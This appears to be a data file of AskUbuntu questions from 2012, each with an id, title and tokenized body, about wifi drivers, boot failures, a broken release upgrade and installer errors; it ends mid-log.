224052	hp pavilion tx2000 - wifi adapter no longer works after moving from 12.04 to a 12.10 clean install	i have a hp pavilion tx2000 that i have been running ubuntu 12.04 on for a couple of months without any problems ( wifi worked great ) until yesterday when my hard drive failed . i replaced the hard drive and decided to install ubuntu 12.10 . unlike 12.04 , the wifi did not work after the installation finished and all the updates where installed ( over ethernet ) . the network drop down in the top right did n't even show a wireless option . i googled about for a bit and found some solutions that seemed like they might work . unfortunately they did not . here is what i tried : sudo apt-get remove bcmwl-kernel-source sudo apt-get install b43-fwcutter sudo apt-get install firmware-b43-lpphy-installer restart the computer . and the wifi still did n't work . at which point i panicked a bit and tried to undo the previous commands by running : sudo apt-get remove b43-fwcutter firmware-b43-lpphy-installer sudo apt-get install bcmwl-kernel-source restart the computer . the wifi still does n't work . this is where i stopped because i have no idea what i am doing and do n't want to mess something up . the network drop down still does n't show a wireless option and the hardware wifi switch on the laptop is amber ( it turns blue when the wifi is on ) . using the hardware switch does not change the color . output from : sudo lspci ... 08:00.0 network controller : broadcom corporation bcm4322 802.11a/b/g/n wireless lan controller ( rev 01 ) ... output from : sudo lshw -class network *-network unclaimed description : network controller product : bcm4322 802.11a/b/g/n wireless lan controller vendor : broadcom corporation physical id : 0 bus info : pci @ 0000:08:00.0 version : 01 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list configuration : latency=0 resources : memory : d1100000-d1103fff ... output from : sudo rfkill list all 0 : hp-wifi : wireless lan soft blocked : no hard blocked : yes update : after writing up this question tried the following command : sudo rfkill unblock all at first it did n't do anything but after running it about four times , sudo rfkill list all now returns : 0 : hp-wifi : wireless lan soft blocked : no hard blocked : no but the network menu still does not have a wireless option and the hardware switch still glows amber . pushing the hardware switch turns the hard block back on and i have to run sudo rfkill unblock all multiple times again to turn it off . any help is appreciated ! update 2 : full output from sudo lspci -nn : 00:00.0 host bridge [ 0600 ] : advanced micro devices [ amd ] rs780 host bridge [ 1022:9600 ] 00:01.0 pci bridge [ 0604 ] : advanced micro devices [ amd ] rs780/rs880 pci to pci bridge ( int gfx ) [ 1022:9602 ] 00:04.0 pci bridge [ 0604 ] : advanced micro devices [ amd ] rs780/rs880 pci to pci bridge ( pcie port 0 ) [ 1022:9604 ] 00:05.0 pci bridge [ 0604 ] : advanced micro devices [ amd ] rs780/rs880 pci to pci bridge ( pcie port 1 ) [ 1022:9605 ] 00:06.0 pci bridge [ 0604 ] : advanced micro devices [ amd ] rs780 pci to pci bridge ( pcie port 2 ) [ 1022:9606 ] 00:11.0 sata controller [ 0106 ] : advanced micro devices [ amd ] nee ati sb7x0/sb8x0/sb9x0 sata controller [ ahci mode ] [ 1002:4391 ] 00:12.0 usb controller [ 0c03 ] : advanced micro devices [ amd ] nee ati sb7x0/sb8x0/sb9x0 usb ohci0 controller [ 1002:4397 ] 00:12.1 usb controller [ 0c03 ] : advanced micro devices [ amd ] nee ati sb7x0 usb ohci1 controller [ 1002:4398 ] 00:12.2 usb controller [ 0c03 ] : advanced micro devices [ amd ] nee ati sb7x0/sb8x0/sb9x0 usb ehci controller [ 1002:4396 ] 00:13.0 usb controller [ 0c03 ] : advanced micro devices [ amd ] nee ati sb7x0/sb8x0/sb9x0 usb ohci0 controller [ 1002:4397 ] 00:13.1 usb controller [ 0c03 ] : advanced micro devices [ amd ] nee ati sb7x0 usb ohci1 controller [ 1002:4398 ] 00:13.2 usb controller [ 0c03 ] : advanced micro devices [ amd ] nee ati sb7x0/sb8x0/sb9x0 usb ehci controller [ 1002:4396 ] 00:14.0 smbus [ 0c05 ] : advanced micro devices [ amd ] nee ati sbx00 smbus controller [ 1002:4385 ] ( rev 3a ) 00:14.1 ide interface [ 0101 ] : advanced micro devices [ amd ] nee ati sb7x0/sb8x0/sb9x0 ide controller [ 1002:439c ] 00:14.2 audio device [ 0403 ] : advanced micro devices [ amd ] nee ati sbx00 azalia ( intel hda ) [ 1002:4383 ] 00:14.3 isa bridge [ 0601 ] : advanced micro devices [ amd ] nee ati sb7x0/sb8x0/sb9x0 lpc host controller [ 1002:439d ] 00:14.4 pci bridge [ 0604 ] : advanced micro devices [ amd ] nee ati sbx00 pci to pci bridge [ 1002:4384 ] 00:14.5 usb controller [ 0c03 ] : advanced micro devices [ amd ] nee ati sb7x0/sb8x0/sb9x0 usb ohci2 controller [ 1002:4399 ] 00:18.0 host bridge [ 0600 ] : advanced micro devices [ amd ] family 11h processor hypertransport configuration [ 1022:1300 ] ( rev 40 ) 00:18.1 host bridge [ 0600 ] : advanced micro devices [ amd ] family 11h processor address map [ 1022:1301 ] 00:18.2 host bridge [ 0600 ] : advanced micro devices [ amd ] family 11h processor dram controller [ 1022:1302 ] 00:18.3 host bridge [ 0600 ] : advanced micro devices [ amd ] family 11h processor miscellaneous control [ 1022:1303 ] 00:18.4 host bridge [ 0600 ] : advanced micro devices [ amd ] family 11h processor link control [ 1022:1304 ] 01:05.0 vga compatible controller [ 0300 ] : advanced micro devices [ amd ] nee ati rs780m/rs780mn [ mobility radeon hd 3200 graphics ] [ 1002:9612 ] 08:00.0 network controller [ 0280 ] : broadcom corporation bcm4322 802.11a/b/g/n wireless lan controller [ 14e4:432b ] ( rev 01 ) 09:00.0 ethernet controller [ 0200 ] : realtek semiconductor co. , ltd. rtl8111/8168b pci express gigabit ethernet controller [ 10ec:8168 ] ( rev 02 )
224057	dhcp server configured in ubuntu on vmware	how can i test a dhcp server running on ubuntu in vmware ? my dhcp configuration is : ddns : update-style none ; default-lease-time 600 ; max-lease-time 7200 ; subnet 192.168.56.0 netmask 255.255.255.0 { range 192.168.56.20 192.168.56.30 option routers 192.168.56.1 ; option subnet-mask 255.255.255.0 ; option broadcast-address 192.168.56.255 option domain-names-servers 192.168.56.53 }
224061	help with getting an older wintv-pvr-150 to work in ubuntu 12.10	i admit i am completely new and green to the world of capture cards . at the moment , id only like to view the stream coming from my old vcr as opposed to recording anything ( for now ) . the vcr is confirmed working with my regular tv , hooked through av cords . but when i try and use vlc , all i get is screen static . this is how i get what little i have . open vlc open capture device under capture mode , the one i can get to show something is 'video for linux 2' video device name : /dev/video32 is the only one that will show anything . running either video0 or video24 causes vlc to close audio device name : hw0:0 video standard : ntsc ( though i tried undefined and got the same thing ) ..and with this , all i get is static , as ive said . im at a loss and could really use pointers from someone who has experience with these cards .
224062	how do i retrieve my files from an ubuntu install that ca n't boot ?	one day i was turning on the computer , and it simply would n't turn on . ubuntu would start to turn on , but froze up/quit just as it was `` loading the dots '' on the ubuntu boot up screen ( plymouth ) . it does n't get past that , and i have files i need in ubuntu that i obviously can not retrieve using windows . if anyone knows how to access ubuntu files from windows then i can just get my files and then re-install ubuntu . someone told me this was a bug in the last update and said to 'use an older date ' when turning it on , but there 's no option for this in my boot up screen .
224065	is there a picasa download for ubuntu ?	i love using picasa and am totally dissapointed to find nothing of the sort in ubuntu and not being about to download it ... anyone know how to ?
224066	problems booting 12.04 lts	i have had ubuntu for awhile now and have n't had any real issues until recently . about 1-2 months ago i started having booting issues . on bootup , i receive a debian screen asking for what version i want to start or do i want to start in recovery mode . this is weird because i do n't have a dual/multi os setup on my laptop . sometimes i only have to hit enter once and then i receive the ubuntu login screen , but most of the time , it goes into this infinite loop where that debian screen keeps appearing and no matter what option i chose ( other than recovery mode ) , it stays in the loop . if i chose recovery mode , it gets stuck and i am force to do a hard reboot . does anyone know what may be my problem ? it is really making me think about going back to windows . some information about my laptop ( dell latitude e640 , i5 processor , 8gig ram , 120gb ssd , ubuntu 12.04 lts 64bit ) .
224067	canon pixia mp 230	how do i get scanner working on 12.04 ? looked at searching for printer/scanner canon pixma mp230 ( 32bit ) ubuntu 12.04 drivers and how to install downloaded scanner driver , run but nothing happened . any help for dummies available ?
224068	ca n't install ubuntu 12.10 alongside windows 7 using a usb pen drive	i downloaded the desktop version of ubuntu 12.10 32-bit and installed it in my computer with the `` universal usb installer '' . i restarted the computer and the computer automaticaly ran the ubuntu instalation . i set it to install alongside windows 7 . i was planning to leave 80gb for windows and 170gb for ubuntu . after i set everything , i cliked to install and then came my problem . it would n't install . it was taking an awful lot of time so i saw there was an error message ( i do n't know what exactly ) appearing on the instalation screen . i had to abruptly stop the whole operation because there was n't a button to cancel ! my windows seems to be fine and i 'm not having any problems with it . and you probably should know that there are no more than 10gbs of files and software on my computer . p.s . : sorry , if it was hard to understand . i do n't really know much about computer and i 'm new to ubuntu and obviously english is n't my first language !
224071	cpu fan not working on acer 4755g i3 ubuntu 12.10	hope you can help me , i 'm new to ubuntu and install this 12.10 version on my acer laptop . the problem is i always got high temperature and maybe because my cpu fan is not working . tried to install acerhdf but unfortunately it says unsupported bios . the temp i always got is 75 and higher and when i tried to open youtube or play any music and videos , my system restart . i also found out that this laptop does n't support linux according to their site . so if you could help me it would be great , and if there is no solution to this then maybe i 'll try other platform . thank you..
224074	lxde also affects gaming performance ?	can somebody clear this up for me please ? i always thought lxde comes without a compositor or an element that is present in other desktop environments ( de 's ) that causes other desktop environments to degrade desktop performance . if it was the case , lxde would beat any de in terms of gaming performance in any test but it does n't seem to be the case - see http : //www.phoronix.com/scan.php ? page=article & item=ubuntu_1210beta_desktops & num=1 https : //help.ubuntu.com/community/openbox
224075	uninstall ubuntu 12.04 to 12.10	i have ubuntu 12.04 and i would like to remove it and reinstall it with ubuntu 12.10 but i also dual boot it with windows 7. all i want to do is remove the ubuntu 12.04 so then i can install 12.10. any ideas ? i dont want anything complicated ... isnt there like a remove feature inside of ubuntu ? like windows you can just uninstall it ? is there no button to uninstall ubuntu in ubuntu ? its just because my 12.04 wont connect to servers porperally and upgrade so im trying ubuntu 12.10. thanks ,
224079	interrupted upgrade	i was running ubuntu 11.10 without major flaws and somewhat adapted to my taste and decided to give upgrading another shot . somehow i do so every couple of years and every time i face reinstall . this time , i 'm not giving up just yet . i got to 12.04 after just half a day of fiddling with it , everything worked except wifi and the css being messed up but i wanted to go on to 12.10 . i managed to start the upgrade with little frustration and as it was about 10 % through the install step , i accidentally pressed the up key on one of my terminal sessions and boom apt-get clean . during upgrade . of course it died , threw error after error , would not let me cancel would not finish configuring at least what had been installed already . so i killed it . i was able to reboot and uninstall reinstall configure some things but after a reboot i could n't even get into recovery mode . so i 'm in live mode using chroot and these are my outputs . i do n't seem to have the internet connection available through chroot but from the output you can see that there 's nothing in the sources . clean , autoclean , autoremove root @ ubuntu : / # apt-get clean root @ ubuntu : / # apt-get autoclean reading package lists ... done building dependency tree reading state information ... done root @ ubuntu : / # apt-get autoremove reading package lists ... done building dependency tree reading state information ... done you might want to run 'apt-get -f install ' to correct these . the following packages have unmet dependencies : apturl-common : depends : python3-update-manager but it is not installed ca-certificates-java : depends : ca-certificates ( > = 20121114 ) but 20111211 is installed chromium-browser-l10n : depends : chromium-browser ( = 22.0.1229.94~r161065-0ubuntu1 ) but 20.0.1132.47~r144678-0ubuntu0.12.04.1 is installed e2fsprogs : predepends : e2fslibs ( = 1.42-1ubuntu2 ) but 1.42.5-1ubuntu3 is installed gir1.2-mutter-3.0 : depends : libmutter0a but it is not installable gnome-orca : depends : python3-speechd ( > = 0.6.2 ) but it is not installed gnome-shell : depends : libmutter0a but it is not installable recommends : gnome-user-guide but it is not installed libexttextcat0 : depends : libexttextcat-data ( = 3.2.0-1ubuntu1 ) but 3.4.0-1 is installed libmutter0 : depends : mutter-common ( = 3.6.1-0ubuntu1 ) but 3.6.2-0ubuntu1 is installed libreoffice-base-core : depends : libreoffice-core ( = 1:3.6.2~rc2-0ubuntu6 ) but 1:3.5.4-0ubuntu1.1 is installed libreoffice-calc : depends : libreoffice-core ( = 1:3.6.2~rc2-0ubuntu6 ) but 1:3.5.4-0ubuntu1.1 is installed libreoffice-common : breaks : libreoffice-style-tango ( > = 1:3.6~ ) but 1:3.6.2~rc2-0ubuntu6 is installed libreoffice-draw : depends : libreoffice-core ( = 1:3.6.2~rc2-0ubuntu6 ) but 1:3.5.4-0ubuntu1.1 is installed recommends : libreoffice-pdfimport but it is not installed libreoffice-gnome : depends : libreoffice-core ( = 1:3.6.2~rc2-0ubuntu6 ) but 1:3.5.4-0ubuntu1.1 is installed libreoffice-gtk : depends : libreoffice-core ( = 1:3.6.2~rc2-0ubuntu6 ) but 1:3.5.4-0ubuntu1.1 is installed libreoffice-impress : depends : libreoffice-core ( = 1:3.6.2~rc2-0ubuntu6 ) but 1:3.5.4-0ubuntu1.1 is installed libreoffice-math : depends : libreoffice-core ( = 1:3.6.2~rc2-0ubuntu6 ) but 1:3.5.4-0ubuntu1.1 is installed libreoffice-writer : depends : libreoffice-core ( = 1:3.6.2~rc2-0ubuntu6 ) but 1:3.5.4-0ubuntu1.1 is installed mahjongg : depends : gnome-mahjongg but it is not installed module-init-tools : depends : kmod but it is not installable python-uno : depends : libreoffice-core ( = 1:3.6.2~rc2-0ubuntu6 ) but 1:3.5.4-0ubuntu1.1 is installed python3-distupgrade : depends : python3-update-manager but it is not installed rpm : depends : rpm-common ( = 4.10.1-2 ) but 4.9.1.1-1build1 is installed rpm2cpio : depends : rpm-common ( = 4.10.1-2 ) but 4.9.1.1-1build1 is installed ubuntuone-control-panel-qt : depends : python-ubuntuone-control-panel ( = 3.0.1-0ubuntu1 ) but 4.0.0-0ubuntu1 is installed depends : ubuntuone-control-panel ( = 3.0.1-0ubuntu1 ) but 4.0.0-0ubuntu1 is installed update-manager-core : depends : python3-update-manager ( = 1:0.174.3 ) but it is not installed vlc-nox : depends : libupnp6 ( > = 1.4.3 ) but it is not installed e : unmet dependencies . try using -f. root @ ubuntu : / # update upgrade dist-upgrade root @ ubuntu : / # apt-get update err http : //archive.ubuntu.com quantal inrelease err http : //archive.ubuntu.com quantal-updates inrelease err http : //archive.ubuntu.com quantal-security inrelease err http : //archive.ubuntu.com quantal release.gpg could not resolve 'archive.ubuntu.com' err http : //archive.ubuntu.com quantal-updates release.gpg could not resolve 'archive.ubuntu.com' err http : //archive.ubuntu.com quantal-security release.gpg could not resolve 'archive.ubuntu.com' reading package lists ... done w : failed to fetch http : //archive.ubuntu.com/ubuntu/dists/quantal/inrelease w : failed to fetch http : //archive.ubuntu.com/ubuntu/dists/quantal-updates/inrelease w : failed to fetch http : //archive.ubuntu.com/ubuntu/dists/quantal-security/inrelease w : failed to fetch http : //archive.ubuntu.com/ubuntu/dists/quantal/release.gpg could not resolve 'archive.ubuntu.com' w : failed to fetch http : //archive.ubuntu.com/ubuntu/dists/quantal-updates/release.gpg could not resolve 'archive.ubuntu.com' w : failed to fetch http : //archive.ubuntu.com/ubuntu/dists/quantal-security/release.gpg could not resolve 'archive.ubuntu.com' w : some index files failed to download . they have been ignored , or old ones used instead . root @ ubuntu : / # apt-get upgrade reading package lists ... done building dependency tree reading state information ... done you might want to run 'apt-get -f install ' to correct these . the following packages have unmet dependencies : apturl-common : depends : python3-update-manager but it is not installed ca-certificates-java : depends : ca-certificates ( > = 20121114 ) but 20111211 is installed chromium-browser-l10n : depends : chromium-browser ( = 22.0.1229.94~r161065-0ubuntu1 ) but 20.0.1132.47~r144678-0ubuntu0.12.04.1 is installed e2fsprogs : predepends : e2fslibs ( = 1.42-1ubuntu2 ) but 1.42.5-1ubuntu3 is installed gir1.2-mutter-3.0 : depends : libmutter0a but it is not installable gnome-orca : depends : python3-speechd ( > = 0.6.2 ) but it is not installed gnome-shell : depends : libmutter0a but it is not installable recommends : gnome-user-guide but it is not installed libexttextcat0 : depends : libexttextcat-data ( = 3.2.0-1ubuntu1 ) but 3.4.0-1 is installed libmutter0 : depends : mutter-common ( = 3.6.1-0ubuntu1 ) but 3.6.2-0ubuntu1 is installed libreoffice-base-core : depends : libreoffice-core ( = 1:3.6.2~rc2-0ubuntu6 ) but 1:3.5.4-0ubuntu1.1 is installed libreoffice-calc : depends : libreoffice-core ( = 1:3.6.2~rc2-0ubuntu6 ) but 1:3.5.4-0ubuntu1.1 is installed libreoffice-common : breaks : libreoffice-style-tango ( > = 1:3.6~ ) but 1:3.6.2~rc2-0ubuntu6 is installed libreoffice-draw : depends : libreoffice-core ( = 1:3.6.2~rc2-0ubuntu6 ) but 1:3.5.4-0ubuntu1.1 is installed recommends : libreoffice-pdfimport but it is not installed libreoffice-gnome : depends : libreoffice-core ( = 1:3.6.2~rc2-0ubuntu6 ) but 1:3.5.4-0ubuntu1.1 is installed libreoffice-gtk : depends : libreoffice-core ( = 1:3.6.2~rc2-0ubuntu6 ) but 1:3.5.4-0ubuntu1.1 is installed libreoffice-impress : depends : libreoffice-core ( = 1:3.6.2~rc2-0ubuntu6 ) but 1:3.5.4-0ubuntu1.1 is installed libreoffice-math : depends : libreoffice-core ( = 1:3.6.2~rc2-0ubuntu6 ) but 1:3.5.4-0ubuntu1.1 is installed libreoffice-writer : depends : libreoffice-core ( = 1:3.6.2~rc2-0ubuntu6 ) but 1:3.5.4-0ubuntu1.1 is installed mahjongg : depends : gnome-mahjongg but it is not installed module-init-tools : depends : kmod but it is not installable python-uno : depends : libreoffice-core ( = 1:3.6.2~rc2-0ubuntu6 ) but 1:3.5.4-0ubuntu1.1 is installed python3-distupgrade : depends : python3-update-manager but it is not installed rpm : depends : rpm-common ( = 4.10.1-2 ) but 4.9.1.1-1build1 is installed rpm2cpio : depends : rpm-common ( = 4.10.1-2 ) but 4.9.1.1-1build1 is installed ubuntuone-control-panel-qt : depends : python-ubuntuone-control-panel ( = 3.0.1-0ubuntu1 ) but 4.0.0-0ubuntu1 is installed depends : ubuntuone-control-panel ( = 3.0.1-0ubuntu1 ) but 4.0.0-0ubuntu1 is installed update-manager-core : depends : python3-update-manager ( = 1:0.174.3 ) but it is not installed vlc-nox : depends : libupnp6 ( > = 1.4.3 ) but it is not installed e : unmet dependencies . try using -f. root @ ubuntu : / # apt-get dist-upgrade reading package lists ... done building dependency tree reading state information ... done you might want to run 'apt-get -f install ' to correct these . the following packages have unmet dependencies : apturl-common : depends : python3-update-manager but it is not installed ca-certificates-java : depends : ca-certificates ( > = 20121114 ) but 20111211 is installed chromium-browser-l10n : depends : chromium-browser ( = 22.0.1229.94~r161065-0ubuntu1 ) but 20.0.1132.47~r144678-0ubuntu0.12.04.1 is installed e2fsprogs : predepends : e2fslibs ( = 1.42-1ubuntu2 ) but 1.42.5-1ubuntu3 is installed gir1.2-mutter-3.0 : depends : libmutter0a but it is not installable gnome-orca : depends : python3-speechd ( > = 0.6.2 ) but it is not installed gnome-shell : depends : libmutter0a but it is not installable recommends : gnome-user-guide but it is not installed libexttextcat0 : depends : libexttextcat-data ( = 3.2.0-1ubuntu1 ) but 3.4.0-1 is installed libmutter0 : depends : mutter-common ( = 3.6.1-0ubuntu1 ) but 3.6.2-0ubuntu1 is installed libreoffice-base-core : depends : libreoffice-core ( = 1:3.6.2~rc2-0ubuntu6 ) but 1:3.5.4-0ubuntu1.1 is installed libreoffice-calc : depends : libreoffice-core ( = 1:3.6.2~rc2-0ubuntu6 ) but 1:3.5.4-0ubuntu1.1 is installed libreoffice-common : breaks : libreoffice-style-tango ( > = 1:3.6~ ) but 1:3.6.2~rc2-0ubuntu6 is installed libreoffice-draw : depends : libreoffice-core ( = 1:3.6.2~rc2-0ubuntu6 ) but 1:3.5.4-0ubuntu1.1 is installed recommends : libreoffice-pdfimport but it is not installed libreoffice-gnome : depends : libreoffice-core ( = 1:3.6.2~rc2-0ubuntu6 ) but 1:3.5.4-0ubuntu1.1 is installed libreoffice-gtk : depends : libreoffice-core ( = 1:3.6.2~rc2-0ubuntu6 ) but 1:3.5.4-0ubuntu1.1 is installed libreoffice-impress : depends : libreoffice-core ( = 1:3.6.2~rc2-0ubuntu6 ) but 1:3.5.4-0ubuntu1.1 is installed libreoffice-math : depends : libreoffice-core ( = 1:3.6.2~rc2-0ubuntu6 ) but 1:3.5.4-0ubuntu1.1 is installed libreoffice-writer : depends : libreoffice-core ( = 1:3.6.2~rc2-0ubuntu6 ) but 1:3.5.4-0ubuntu1.1 is installed mahjongg : depends : gnome-mahjongg but it is not installed module-init-tools : depends : kmod but it is not installable python-uno : depends : libreoffice-core ( = 1:3.6.2~rc2-0ubuntu6 ) but 1:3.5.4-0ubuntu1.1 is installed python3-distupgrade : depends : python3-update-manager but it is not installed rpm : depends : rpm-common ( = 4.10.1-2 ) but 4.9.1.1-1build1 is installed rpm2cpio : depends : rpm-common ( = 4.10.1-2 ) but 4.9.1.1-1build1 is installed ubuntuone-control-panel-qt : depends : python-ubuntuone-control-panel ( = 3.0.1-0ubuntu1 ) but 4.0.0-0ubuntu1 is installed depends : ubuntuone-control-panel ( = 3.0.1-0ubuntu1 ) but 4.0.0-0ubuntu1 is installed update-manager-core : depends : python3-update-manager ( = 1:0.174.3 ) but it is not installed vlc-nox : depends : libupnp6 ( > = 1.4.3 ) but it is not installed e : unmet dependencies . try using -f. root @ ubuntu : / # -f install root @ ubuntu : / # apt-get -f install reading package lists ... done building dependency tree reading state information ... done correcting dependencies ... failed . the following packages have unmet dependencies : apturl-common : depends : python3-update-manager but it is not installed ca-certificates-java : depends : ca-certificates ( > = 20121114 ) but 20111211 is installed chromium-browser-l10n : depends : chromium-browser ( = 22.0.1229.94~r161065-0ubuntu1 ) but 20.0.1132.47~r144678-0ubuntu0.12.04.1 is installed e2fsprogs : predepends : e2fslibs ( = 1.42-1ubuntu2 ) but 1.42.5-1ubuntu3 is installed gir1.2-mutter-3.0 : depends : libmutter0a but it is not installable gnome-orca : depends : python3-speechd ( > = 0.6.2 ) but it is not installed gnome-shell : depends : libmutter0a but it is not installable recommends : gnome-user-guide but it is not installed libexttextcat0 : depends : libexttextcat-data ( = 3.2.0-1ubuntu1 ) but 3.4.0-1 is installed libmutter0 : depends : mutter-common ( = 3.6.1-0ubuntu1 ) but 3.6.2-0ubuntu1 is installed libreoffice-base-core : depends : libreoffice-core ( = 1:3.6.2~rc2-0ubuntu6 ) but 1:3.5.4-0ubuntu1.1 is installed libreoffice-calc : depends : libreoffice-core ( = 1:3.6.2~rc2-0ubuntu6 ) but 1:3.5.4-0ubuntu1.1 is installed libreoffice-common : breaks : libreoffice-style-tango ( > = 1:3.6~ ) but 1:3.6.2~rc2-0ubuntu6 is installed libreoffice-draw : depends : libreoffice-core ( = 1:3.6.2~rc2-0ubuntu6 ) but 1:3.5.4-0ubuntu1.1 is installed recommends : libreoffice-pdfimport but it is not installed libreoffice-gnome : depends : libreoffice-core ( = 1:3.6.2~rc2-0ubuntu6 ) but 1:3.5.4-0ubuntu1.1 is installed libreoffice-gtk : depends : libreoffice-core ( = 1:3.6.2~rc2-0ubuntu6 ) but 1:3.5.4-0ubuntu1.1 is installed libreoffice-impress : depends : libreoffice-core ( = 1:3.6.2~rc2-0ubuntu6 ) but 1:3.5.4-0ubuntu1.1 is installed libreoffice-math : depends : libreoffice-core ( = 1:3.6.2~rc2-0ubuntu6 ) but 1:3.5.4-0ubuntu1.1 is installed libreoffice-writer : depends : libreoffice-core ( = 1:3.6.2~rc2-0ubuntu6 ) but 1:3.5.4-0ubuntu1.1 is installed mahjongg : depends : gnome-mahjongg but it is not installed module-init-tools : depends : kmod but it is not installable python-uno : depends : libreoffice-core ( = 1:3.6.2~rc2-0ubuntu6 ) but 1:3.5.4-0ubuntu1.1 is installed python3-distupgrade : depends : python3-update-manager but it is not installed rpm : depends : rpm-common ( = 4.10.1-2 ) but 4.9.1.1-1build1 is installed rpm2cpio : depends : rpm-common ( = 4.10.1-2 ) but 4.9.1.1-1build1 is installed ubuntuone-control-panel-qt : depends : python-ubuntuone-control-panel ( = 3.0.1-0ubuntu1 ) but 4.0.0-0ubuntu1 is installed depends : ubuntuone-control-panel ( = 3.0.1-0ubuntu1 ) but 4.0.0-0ubuntu1 is installed update-manager-core : depends : python3-update-manager ( = 1:0.174.3 ) but it is not installed vlc-nox : depends : libupnp6 ( > = 1.4.3 ) but it is not installed e : error , pkgproblemresolver : :resolve generated breaks , this may be caused by held packages . e : unable to correct dependencies dpkg.log blablabla 2012-12-01 01:11:49 status half-configured python3.3 : amd64 3.3.0-4 2012-12-01 01:11:49 configure unattended-upgrades : all 0.79.3ubuntu6 2012-12-01 01:11:49 status half-configured unattended-upgrades : all 0.79.3ubuntu6 2012-12-01 01:11:49 configure dmsetup : amd64 2:1.02.74-5ubuntu1 2012-12-01 01:11:49 status half-configured dmsetup : amd64 2:1.02.74-5ubuntu1 2012-12-01 01:11:51 configure python3 : amd64 3.3.0-0ubuntu3 2012-12-01 01:11:51 status half-configured python3 : amd64 3.3.0-0ubuntu3 2012-12-01 01:11:51 configure apparmor : amd64 2.8.0-0ubuntu7 2012-12-01 01:11:51 status half-configured apparmor : amd64 2.8.0-0ubuntu7 2012-12-01 01:11:52 configure initramfs-tools : all 0.103ubuntu0.3 2012-12-01 01:11:52 status half-configured initramfs-tools : all 0.103ubuntu0.3 dpkg -- configure -a -- force-all ( does a whole lot of nothing and ends with this : ) /usr/sbin/mkinitramfs : 54 : /usr/sbin/mkinitramfs : modprobe : not found /usr/sbin/mkinitramfs : 136 : /usr/sbin/mkinitramfs : can not create /dev/null : permission denied /usr/sbin/mkinitramfs : 136 : /usr/sbin/mkinitramfs : can not create /dev/null : permission denied /usr/sbin/mkinitramfs : 278 : /usr/sbin/mkinitramfs : can not create /dev/null : permission denied warning : no ldd around - install libc-bin update-initramfs : failed for /boot/initrd.img-3.2.0-34-generic with 1. dpkg : error processing initramfs-tools ( -- configure ) : subprocess installed post-installation script returned error exit status 1 errors were encountered while processing : sudo openjdk-7-jre-headless : amd64 login python-minimal ntfs-3g dbus aspell-en resolvconf python3.3-minimal samba-common x11-common bash-completion gconf2 cron util-linux pulseaudio winbind python3.3 unattended-upgrades dmsetup python3 apparmor initramfs-tools does anybody know any way of removing those unmet dependencies , reinstalling them , configuring them , upgrading my os so that i can use it again ? thanks ! i got a step further ! just now had dpkg install many packages over . after this , the configure which failed but after that -f install which magically even tried to remove and reinstall some things ! this is an epic success , i 'll try to download what 's needed in my live system and feed it to it through dpkg i 'll keep you posted .
224081	how to enable wireless in a fujitsu lh532 ?	i have a fujitsu lh532 and when i installed ubuntu , the network menu did n't have `` connect to hidden network '' option nor `` create a new network '' . i am not sure how to check my wireless card since when i enter lspci -vvnn | grep 14e4 in the terminal nothing happens except it opens a new line . result was : 04:00.0 network controller [ 0280 ] : ralink corp. device [ 1814:3290 ]
224082	just installed 12.10 but ca n't get past login	installed 12.10 but i can not login . it just loops back to the login every time . either that or it displays only my wallpaper , no icons/time/power , and then loops back to the login . i cant use ctrl+alt+f1-f6 to get to console either , just does n't do anything .
224083	installation from usb	want to install ubuntu from usb flash but after i press continue after the install alongside windows button my hp pavillion laptop restarts and boots into vista and starts wubi installer . the wubi installer installation process ends with the following error . 'none type ' object has no attribute 'get_info ' a portion of log file is as follows 12-01 06:15 debug downloader : download finished ( read 198 bytes ) 12-01 06:15 info saplog : verified a signature from id : '46181433fbb75451 ' . 12-01 06:15 info saplog : checking block bindings.. 12-01 06:15 info saplog : key verified successfully . 12-01 06:15 debug commonbackend : metalink md5sums : 1fdde0057923dc6c4bd69b657480a631 *ubuntu-12.10-beta2-desktop-amd64+mac.metalink 091d4adafcfe4eea08eb41771be3f3ba *ubuntu-12.10-beta2-desktop-amd64.metalink 940ab0bf82879435181f8c03304e7387 *ubuntu-12.10-beta2-desktop-armhf+omap4.metalink 9e0ad0a15414df437a27c66da938d3e3 *ubuntu-12.10-beta2-desktop-i386.metalink 4672b67404c84ba74bf104607bbec49a *ubuntu-12.10-beta2-server-amd64+mac.metalink a8d35d8579f11579e802667bbcb7b0fb *ubuntu-12.10-beta2-server-amd64.metalink fb6219893d9f4f329183fafaac258681 *ubuntu-12.10-beta2-server-armhf+omap4.metalink 12fbf5ccf3aedfd8fe31f1ab00ec8ddb *ubuntu-12.10-beta2-server-i386.metalink e1a7672decc21eb6a65464b0a239a1db *ubuntu-12.10-desktop-amd64+mac.metalink 894437367bf791cf02902d6f5285af98 *ubuntu-12.10-desktop-amd64.metalink 57a58f151b50e218acc4724388d2f387 *ubuntu-12.10-desktop-armhf+omap4.metalink 11e206f0d5e147fe05b9e85d78f5f187 *ubuntu-12.10-desktop-i386.metalink fc37a124ca1957d7549a296d59e3dd81 *ubuntu-12.10-server-amd64+mac.metalink 35afee005d732a9ad0361b4aae25e3c3 *ubuntu-12.10-server-amd64.metalink 68adfc9d71d5b3613a09c3e6c45f8ba5 *ubuntu-12.10-server-armhf+omap4.metalink c4fd126394cf2e1bbd626b5f74b3e40b *ubuntu-12.10-server-i386.metalink 12-01 06:15 error commonbackend : the md5 of the metalink does match 12-01 06:15 error commonbackend : can not authenticate the metalink file , it might be corrupt none 12-01 06:15 debug tasklist : # # # # finished get_metalink 12-01 06:15 debug tasklist : new task get_file_md5 12-01 06:15 debug tasklist : # # # # running get_file_md5 ... 12-01 06:17 debug tasklist : # # # # finished get_file_md5 12-01 06:17 error commonbackend : invalid md5 for iso d : \ubuntu\install\installation.iso ( b4191c1d1d6fdf358c154f8bf86b97dd ! = 7e15759e5716c9bc662cd3efa5514cef ) none 12-01 06:17 debug tasklist : # # # finished check_iso 12-01 06:17 error tasklist : 'nonetype ' object has no attribute 'get_info' traceback ( most recent call last ) : file `` \lib\wubi\backends\common\tasklist.py '' , line 197 , in __call__ file `` \lib\wubi\backends\common\backend.py '' , line 595 , in get_iso file `` \lib\wubi\backends\common\backend.py '' , line 564 , in use_cd attributeerror : 'nonetype ' object has no attribute 'get_info' 12-01 06:17 debug tasklist : # cancelling tasklist 12-01 06:17 debug tasklist : # finished tasklist 12-01 06:17 error root : 'nonetype ' object has no attribute 'get_info' traceback ( most recent call last ) : file `` \lib\wubi\application.py '' , line 58 , in run file `` \lib\wubi\application.py '' , line 132 , in select_task file `` \lib\wubi\application.py '' , line 158 , in run_installer file `` \lib\wubi\backends\common\tasklist.py '' , line 